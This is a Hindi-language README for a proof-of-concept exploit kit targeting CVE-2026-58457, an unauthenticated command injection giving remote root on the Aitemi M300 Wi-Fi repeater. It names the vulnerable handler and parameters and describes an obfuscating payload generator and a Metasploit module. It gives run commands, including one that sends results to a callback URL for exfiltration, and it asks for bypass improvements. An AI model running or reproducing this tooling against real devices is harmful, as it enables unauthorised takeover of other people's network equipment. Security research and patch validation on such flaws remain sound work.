CVE-2026-58457 के लिए PoC उपकरण: शेन्ज़ेन Aitemi M300 वाई-फाई रिपीटर (MT02) पर दूरस्थ रूट की ओर ले जाने वाला बिना प्रमाणीकरण के OS कमांड इंजेक्शन। इसमें शोषण, सत्यापनकर्ता, पेलोड जनरेटर और Metasploit मॉड्यूल शामिल हैं। केवल शैक्षिक और अधिकृत पेंटेस्टिंग के लिए।
[!WARNING] यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए AS IS प्रदान किया गया है। इस PoC का उपयोग उत्पादन प्रणालियों, साझा वातावरण, या किसी अनधिकृत लक्ष्य पर न करें।
- इस कोड को चलाने या होस्ट करने से एंटीवायरस डिटेक्शन, सुरक्षा निगरानी अलर्ट, या दुरुपयोग होने पर कानूनी परिणाम ट्रिगर हो सकते हैं।
- लेखक और रिपॉजिटरी अनुरक्षक इस कोड से उत्पन्न किसी भी क्षति, दुरुपयोग, या अवैध गतिविधि के लिए कोई दायित्व नहीं मानते हैं।
- उचित प्राधिकरण के साथ विशेष रूप से पृथक प्रयोगशाला वातावरण में उपयोग करें। केवल रक्षात्मक अनुसंधान, भेद्यता विश्लेषण, और ब्लू-टीम परीक्षण के लिए उद्देश्यित।
एक अनधिकृत OS कमांड इंजेक्शन भेद्यता smacfilter_conf हैंडलर में मौजूद है। name, enable, और mac GET पैरामीटर बिना स्वच्छ किए एक sprintf() कॉल में पास किए जाते हैं जो के रूप में निष्पादित UCI कमांड का निर्माण करता है।
poc.py - HTTPS समर्थन, पुनर्प्रयास, टाइमआउट, और कॉलबैक एक्सफ़िल्ट्रेशन के साथ पूर्ण-विशेषता वाला शोषण।val.py - सुरक्षित, निष्क्रिय भेद्यता सत्यापक (हानिरहित id कमांड का उपयोग करता है)।gen.py - कई अस्पष्टता तकनीकों के साथ उन्नत पेलोड जनरेटर।MITIGATIONS.md - अनुशंसित रक्षात्मक उपाय।exploit/ निर्देशिका में उपलब्ध।pip install requests
python3 val.py --target 192.168.1.100
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
python3 gen.py -c "id" -n 10
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# या मुख्य MSF पथ: /usr/share/metasploit-framework/modules/exploits/linux/http/
msfconsole -q -x "reload_all"
स्टार्स और योगदान का स्वागत है - विशेष रूप से बाईपास या अतिरिक्त फर्मवेयर वेरिएंट में सुधार।